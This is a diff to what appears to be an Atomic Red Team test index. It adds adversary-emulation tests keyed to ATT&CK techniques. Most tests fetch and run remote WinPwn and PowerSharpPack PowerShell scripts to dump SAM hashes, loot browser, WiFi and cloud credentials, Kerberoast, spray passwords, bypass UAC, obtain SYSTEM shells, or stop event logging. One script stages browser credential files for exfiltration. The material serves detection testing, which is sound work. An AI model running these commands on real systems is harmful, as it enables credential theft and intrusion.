+      auto_generated_guid: 8c385f88-4d47-4c9a-814d-93d9deec8c71
+      description: PowerSharpPack - Kerberoasting Using Rubeus technique via function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
+          Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"
+        name: powershell
   T1557:
     technique:
       object_marking_refs:
@@ -1231,6 +1242,84 @@ credential-access:
         elevation_required: false
         command: "for file in $(find / -name .netrc 2> /dev/null);do echo $file ;
           cat $file ; done \n"
+    - name: WinPwn - sensitivefiles
+      auto_generated_guid: 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0
+      description: Search for sensitive files on this local system using the SensitiveFiles
+        function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          sensitivefiles -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - Snaffler
+      auto_generated_guid: fdd0c913-714b-4c13-b40f-1824d6c015f2
+      description: Check Domain Network-Shares for cleartext passwords using Snaffler
+        function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          Snaffler -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - powershellsensitive
+      auto_generated_guid: 75f66e03-37d3-4704-9520-3210efbe33ce
+      description: Check Powershell event logs for credentials or other sensitive
+        information via winpwn powershellsensitive function.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          powershellsensitive -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - passhunt
+      auto_generated_guid: 00e3e3c7-6c3c-455e-bd4b-461c7f0e7797
+      description: Search for Passwords on this system using passhunt via WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          passhunt -local $true -noninteractive
+        cleanup_command: |-
+          rm -force .\passhunt.exe -ErrorAction Ignore
+          rm -force .\phunter* -ErrorAction Ignore
+          rm -force -recurse .\DomainRecon -ErrorAction Ignore
+          rm -force -recurse .\Exploitation -ErrorAction Ignore
+          rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
+          rm -force -recurse .\LocalRecon -ErrorAction Ignore
+          rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
+        name: powershell
+    - name: WinPwn - SessionGopher
+      auto_generated_guid: c9dc9de3-f961-4284-bd2d-f959c9f9fda5
+      description: Launches SessionGopher on this system via WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          sessionGopher -noninteractive -consoleoutput
+        name: powershell
+    - name: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute
+        credentials
+      auto_generated_guid: aaa87b0e-5232-4649-ae5c-f1724a4b2798
+      description: Loot local Credentials - AWS, Microsoft Azure, and Google Compute
+        credentials technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
+          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
+          -consoleoutput -noninteractive  "
+        name: powershell
   T1555:
     technique:
       object_marking_refs:
@@ -1360,6 +1449,44 @@ credential-access:
         command: 'vaultcmd /listcreds:"Web Credentials" /all
 
           '
+    - name: WinPwn - Loot local Credentials - lazagne
+      auto_generated_guid: '079ee2e9-6f16-47ca-a635-14efcd994118'
+      description: "The [LaZagne project](https://github.com/AlessandroZ/LaZagne)
+        is an open source application used to retrieve lots of passwords stored on
+        a local computer. \nEach software stores its passwords using different techniques
+        (plaintext, APIs, custom algorithms, databases, etc.). \nThis tool has been
+        developed for the purpose of finding these passwords for the most commonly-used
+        software"
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          lazagnemodule -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - Loot local Credentials - Wifi Credentials
+      auto_generated_guid: afe369c2-b42e-447f-98a3-fb1f4e2b8552
+      description: Loot local Credentials - Wifi Credentials technique via function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
+          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds
+          -consoleoutput -noninteractive  "
+        name: powershell
+    - name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
+      auto_generated_guid: db965264-3117-4bad-b7b7-2523b7856b92
+      description: Loot local Credentials - Decrypt Teamviewer Passwords technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
+          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer
+          -consoleoutput -noninteractive  "
+        name: powershell
   T1555.003:
     technique:
       object_marking_refs:
@@ -1779,6 +1906,129 @@ credential-access:
           cat #{Out_Filepath}
         cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue
           \  \n"
+    - name: LaZagne.py - Dump Credentials from Firefox Browser
+      auto_generated_guid: 87e88698-621b-4c45-8a89-4eaebdeaabb1
+      description: Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser,
+        Reference https://github.com/AlessandroZ/LaZagne
+      supported_platforms:
+      - linux
+      input_arguments:
+        lazagne_path:
+          description: Path you put LaZagne Github with LaZagne.py
+          type: String
+          default: "/tmp/LaZagne/Linux"
+        specific_module:
+          description: You may change the module to "all" for all password that can
+            be found by LaZagne.py
+          type: string
+          default: browsers -firefox
+        output_file:
+          description: This is where output for the Firefox passwords goes
+          type: String
+          default: "/tmp/firefox_password.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: Get Lazagne from Github and install requirements
+        prereq_command: 'test -f #{lazagne_path}/laZagne.py'
+        get_prereq_command: cd /tmp; git clone https://github.com/AlessandroZ/LaZagne;
+          cd /tmp/LaZagne/; pip install -r requirements.txt
+      - description: Needs git, python3 and some pip stuff
+        prereq_command: which git && which python3 && which pip
+        get_prereq_command: apt install git; apt install python3-pip -y; pip install
+          pyasn1 psutil Crypto
+      executor:
+        command: 'python3 #{lazagne_path}/laZagne.py #{specific_module} >> #{output_file}'
+        cleanup_command: 'rm -R /tmp/LaZagne; rm -f #{output_file}'
+        name: sh
+        elevation_required: true
+    - name: Stage Popular Credential Files for Exfiltration
+      auto_generated_guid: f543635c-1705-42c3-b180-efd6dc6e7ee7
+      description: "This test is designed to search a drive for credential files used
+        by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge),
+        export the found files to a folder, and zip it,\nsimulating how an adversary
+        might stage sensitive credential files for exfiltration in order to conduct
+        offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd)
+        or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData). \n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: "$exfil_folder = \"$env:temp\\T1555.003\"\nif (test-path \"$exfil_folder\")
+          {} else {new-item -path \"$env:temp\" -Name \"T1555.003\" -ItemType \"directory\"
+          -force}\n$FirefoxCredsLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\nif
+          (test-path \"$FirefoxCredsLocation\\key4.db\") {copy-item \"$FirefoxCredsLocation\\key4.db\"
+          -destination \"$exfil_folder\\T1555.003Firefox_key4.db\"} else {}\nif (test-path
+          \"$FirefoxCredsLocation\\logins.json\") {copy-item \"$FirefoxCredsLocation\\logins.json\"
+          -destination \"$exfil_folder\\T1555.003Firefox_logins.json\"} else {}\nif
+          (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login
+          Data\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login
+          Data\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data\"} else
+          {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login
+          Data For Account\") {copy-item \"$env:localappdata\\Google\\Chrome\\User
+          Data\\Default\\Login Data For Account\" -destination \"$exfil_folder\\T1555.003Chrome_Login
+          Data For Account\"} else {}\nif (test-path \"$env:appdata\\Opera Software\\Opera
+          Stable\\Login Data\") {copy-item \"$env:appdata\\Opera Software\\Opera Stable\\Login
+          Data\" -destination \"$exfil_folder\\T1555.003Opera_Login Data\"} else {}\nif
+          (test-path \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\")
+          {copy-item \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\"
+          -destination \"$exfil_folder\\T1555.003Edge_Login Data\"} else {} \ncompress-archive
+          -path \"$exfil_folder\" -destinationpath \"$exfil_folder.zip\" -force\n"
+        cleanup_command: "Remove-Item -Path \"$env:temp\\T1555.003.zip\" -force -erroraction
+          silentlycontinue   \nRemove-Item -Path \"$env:temp\\T1555.003\\\" -force
+          -recurse -erroraction silentlycontinue\n"
+    - name: WinPwn - BrowserPwn
+      auto_generated_guid: 764ea176-fb71-494c-90ea-72e9d85dce76
+      description: Collect Browser credentials as well as the history via winpwn browserpwn
+        function of WinPwn.
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          browserpwn -consoleoutput -noninteractive
+        cleanup_command: rm .\System.Data.SQLite.dll -ErrorAction Ignore
+        name: powershell
+    - name: WinPwn - Loot local Credentials - mimi-kittenz
+      auto_generated_guid: ec1d0b37-f659-4186-869f-31a554891611
+      description: Loot local Credentials - mimi-kittenz technique via function of
+        WinPwn - Extend timeout to 600s
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          kittenz -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials
+      auto_generated_guid: e5e3d639-6ea8-4408-9ecd-d5a286268ca0
+      description: PowerSharpPack - Sharpweb searching for Browser Credentials technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')
+          Invoke-Sharpweb -command "all"
+        name: powershell
+    - name: Simulating Access to Chrome Login Data - MacOS
+      auto_generated_guid: 124e13e5-d8a1-4378-a6ee-a53cd0c7e369
+      description: "This test locates the Login Data files used by Chrome to store
+        encrypted credentials, then copies them to the temp directory for later exfil.
+        \nOnce the files are exfiltrated, malware like CookieMiner could be used to
+        perform credential extraction. \nSee https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
+        . \n"
+      supported_platforms:
+      - macos
+      executor:
+        command: |
+          cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
+          cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
+        cleanup_command: |
+          rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
+          rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
+        name: sh
   T1552.002:
     technique:
       object_marking_refs:
@@ -2265,6 +2515,17 @@ credential-access:
         command: |
           & "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
           Write-Host "End of PetitPotam attack"
+    - name: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+      auto_generated_guid: 7f06b25c-799e-40f1-89db-999c9cc84317
+      description: PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+        technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
+          Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
+        name: powershell
   T1606:
     technique:
       object_marking_refs:
@@ -3143,6 +3404,28 @@ credential-access:
           -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken
           -ArgumentList $_.Context.PostContext[0].Trim() }  \n"
         name: powershell
+    - name: WinPwn - Kerberoasting
+      auto_generated_guid: 78d10e20-c874-45f2-a9df-6fea0120ec27
+      description: Kerberoasting technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          Kerberoasting -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
+      auto_generated_guid: 29094950-2c96-4cbd-b5e4-f7c65079678f
+      description: PowerSharpPack - Kerberoasting Using Rubeus technique via function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
+          Invoke-Rubeus -Command "kerberoast /format:hashcat /nowrap"
+        name: powershell
   T1555.001:
     technique:
       type: attack-pattern
@@ -4826,6 +5109,33 @@ credential-access:
           del %temp%\trace.cab >nul 2>&1
         name: command_prompt
         elevation_required: true
+    - name: Windows Internal pktmon capture
+      auto_generated_guid: c67ba807-f48b-446e-b955-e4928cd1bf91
+      description: |-
+        Will start a packet capture and store log file as t1040.etl.
+        https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          pktmon.exe start --etw  -f %TEMP%\t1040.etl
+          TIMEOUT /T 5 >nul 2>&1
+          pktmon.exe stop
+        cleanup_command: del %TEMP%\t1040.etl
+        name: command_prompt
+        elevation_required: true
+    - name: Windows Internal pktmon set filter
+      auto_generated_guid: 855fb8b4-b8ab-4785-ae77-09f5df7bff55
+      description: "Select Desired ports for packet capture \nhttps://lolbas-project.github.io/lolbas/Binaries/Pktmon/"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'pktmon.exe filter add -p 445
+
+          '
+        cleanup_command: pktmon filter remove
+        name: command_prompt
+        elevation_required: true
   T1003:
     technique:
       object_marking_refs:
@@ -5839,6 +6149,17 @@ credential-access:
             }
           }
           Write-Host "End of password spraying"
+    - name: WinPwn - DomainPasswordSpray Attacks
+      auto_generated_guid: 5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82
+      description: DomainPasswordSpray Attacks technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          domainpassspray -consoleoutput -noninteractive -emptypasswords
+        name: powershell
   T1556.003:
     technique:
       object_marking_refs:
@@ -6819,6 +7140,17 @@ credential-access:
         cleanup_command: |
           $toremove = #{dump_path} + "\" + '#{dumped_hive}'
           rm $toremove -ErrorAction Ignore
+    - name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
+      auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
+      description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
+          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
+          -consoleoutput -noninteractive  "
+        name: powershell
   T1555.002:
     technique:
       object_marking_refs:
@@ -7697,6 +8029,17 @@ credential-access:
         command: 'vaultcmd /listcreds:"Windows Credentials"
 
           '
+    - name: WinPwn - Loot local Credentials - Invoke-WCMDump
+      auto_generated_guid: fa714db1-63dd-479e-a58e-7b2b52ca5997
+      description: Loot local Credentials - Invoke-WCMDump technique via function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')
+          Invoke-WCMDump
+        name: powershell
 collection:
   T1557.002:
     technique:
@@ -12874,6 +13217,47 @@ privilege-escalation:
           powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
           powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
         name: command_prompt
+    - name: WinPwn - UAC Magic
+      auto_generated_guid: 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc
+      description: UAC bypass using Magic technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
+        name: powershell
+    - name: WinPwn - UAC Bypass ccmstp technique
+      auto_generated_guid: f3c145f9-3c8d-422c-bd99-296a17a8f567
+      description: UAC bypass using ccmstp technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
+        name: powershell
+    - name: WinPwn - UAC Bypass DiskCleanup technique
+      auto_generated_guid: 1ed67900-66cd-4b09-b546-2a0ef4431a0c
+      description: UAC bypass using DiskCleanup technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
+        name: powershell
+    - name: WinPwn - UAC Bypass DccwBypassUAC technique
+      auto_generated_guid: 2b61977b-ae2d-4ae4-89cb-5c36c89586be
+      description: UAC Bypass DccwBypassUAC technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
+        name: powershell
   T1574.012:
     technique:
       object_marking_refs:
@@ -13633,6 +14017,16 @@ privilege-escalation:
           $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
         name: powershell
         elevation_required: true
+    - name: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation
+        technique
+      auto_generated_guid: ccf4ac39-ec93-42be-9035-90e2f26bcd92
+      description: Get SYSTEM shell - Pop System Shell using Token Manipulation technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
+        name: powershell
   T1543:
     technique:
       object_marking_refs:
@@ -14724,7 +15118,7 @@ privilege-escalation:
         command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
 
           '
-        cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
+        cleanup_command: 'sudo sed -i ''s##{path_to_shared_library}##'' /etc/ld.so.preload
 
           '
         name: bash
@@ -14877,6 +15271,16 @@ privilege-escalation:
           Stop-Process -processname notepad
         name: powershell
         elevation_required: true
+    - name: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load
+        technique
+      auto_generated_guid: 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5
+      description: Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
+        name: powershell
   T1548.004:
     technique:
       object_marking_refs:
@@ -16480,6 +16884,29 @@ privilege-escalation:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: WinPwn - Loot local Credentials - powerhell kittie
+      auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
+      description: Loot local Credentials - powerhell kittie technique via function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          obfuskittiedump -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - Loot local Credentials - Safetykatz
+      auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
+      description: Loot local Credentials - Safetykatz technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          safedump -consoleoutput -noninteractive
+        name: powershell
   T1547.015:
     technique:
       object_marking_refs:
@@ -23195,6 +23622,47 @@ defense-evasion:
           powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
           powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
         name: command_prompt
+    - name: WinPwn - UAC Magic
+      auto_generated_guid: 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc
+      description: UAC bypass using Magic technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
+        name: powershell
+    - name: WinPwn - UAC Bypass ccmstp technique
+      auto_generated_guid: f3c145f9-3c8d-422c-bd99-296a17a8f567
+      description: UAC bypass using ccmstp technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
+        name: powershell
+    - name: WinPwn - UAC Bypass DiskCleanup technique
+      auto_generated_guid: 1ed67900-66cd-4b09-b546-2a0ef4431a0c
+      description: UAC bypass using DiskCleanup technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
+        name: powershell
+    - name: WinPwn - UAC Bypass DccwBypassUAC technique
+      auto_generated_guid: 2b61977b-ae2d-4ae4-89cb-5c36c89586be
+      description: UAC Bypass DccwBypassUAC technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
+        name: powershell
   T1218.003:
     technique:
       object_marking_refs:
@@ -25034,6 +25502,16 @@ defense-evasion:
           $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
         name: powershell
         elevation_required: true
+    - name: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation
+        technique
+      auto_generated_guid: ccf4ac39-ec93-42be-9035-90e2f26bcd92
+      description: Get SYSTEM shell - Pop System Shell using Token Manipulation technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
+        name: powershell
   T1578.001:
     technique:
       object_marking_refs:
@@ -27539,6 +28017,16 @@ defense-evasion:
         command: "& $env:temp\\Backstab64.exe -k -n #{process_name}"
         name: powershell
         elevation_required: true
+    - name: WinPwn - Kill the event log services for stealth
+      auto_generated_guid: 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66
+      description: Kill the event log services for stealth via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
+          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
+          -consoleoutput -noninteractive  "
+        name: powershell
   T1078.002:
     technique:
       object_marking_refs:
@@ -28322,7 +28810,7 @@ defense-evasion:
         command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
 
           '
-        cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
+        cleanup_command: 'sudo sed -i ''s##{path_to_shared_library}##'' /etc/ld.so.preload
 
           '
         name: bash
@@ -28475,6 +28963,16 @@ defense-evasion:
           Stop-Process -processname notepad
         name: powershell
         elevation_required: true
+    - name: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load
+        technique
+      auto_generated_guid: 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5
+      description: Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
+        via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
+        name: powershell
   T1548.004:
     technique:
       object_marking_refs:
@@ -32172,6 +32670,29 @@ defense-evasion:
